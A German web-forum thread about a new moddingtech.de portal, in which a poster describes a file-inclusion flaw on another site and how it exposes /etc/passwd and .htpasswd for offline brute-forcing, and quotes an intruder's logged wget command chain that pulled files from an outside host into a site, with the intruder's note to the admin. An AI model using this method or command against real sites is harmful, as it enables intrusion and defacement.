Du bist nicht angemeldet.
Lieber Besucher, herzlich willkommen bei: Aqua Computer Forum. Falls dies dein erster Besuch auf dieser Seite ist, lese dir bitte die Hilfe durch. Dort wird dir die Bedienung dieser Seite näher erläutert. Darüber hinaus solltest du dich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutze das Registrierungsformular, um dich zu registrieren oder informiere dich ausführlich über den Registrierungsvorgang. Falls du dich bereits zu einem früheren Zeitpunkt registriert hast, kannst du dich hier anmelden.
Neues moddingtech.de Portal online!
Neues moddingtech.de Portal online!
Zitat von »-Joker-«
was meinst du mit php-baukasten-seite ???
alles auf der seite ist selbstgecodet, bis auf das news-skript.

Neues moddingtech.de Portal online! 
hoch platzierten seite ein leck gefunden, dass auf einen verbreiteten programmierfehler hinweist: per parameter wird ein dateiname angegeben und der inhalt der datei "in den rest der seite kopiert", so dass er vom design, menü usw. eingeschlossen wird. prüft man dann die pfadangaben nicht, so kann man prinzipiell mit einschränkungen (je nach fall) jede datei im webbrowser anzeigen lassen. auch wenn dies vllt keine passwörter enthüllt, so lässt sich doch zumindest über /etc/passwd, .htpasswd und co einiges an hilfreichen informationen ergattern. bei non-shadowed passwörtern wie z.b. in der .htpasswd lassen sich diese außerdem schön schnell und unbemerkt am eigenen rechner mittels bruteforce nachgenerieren und vergleichen, bei einem treffer hat man zugriff.
Zitat
wget http://geocities.yahoo.com.br/basenod/auto-mar.jpg ; wget http://geocities.yahoo.com.br/baseno/novo.txt ; mv novo.txt mega.html ; wget http://geocities.yahoo.com.br/basenod/help.txt ; mv help.txt mradminatention.html ; ls -alg ;

Zitat
Hello Mr. Administrator...
How Are You?
I discovered some bug's into your website...
If you want help mail-me...
megazoid@linuxmail.org
megazoid (WHITEHAT)
Neues moddingtech.de Portal online! 

Neues moddingtech.de Portal online! -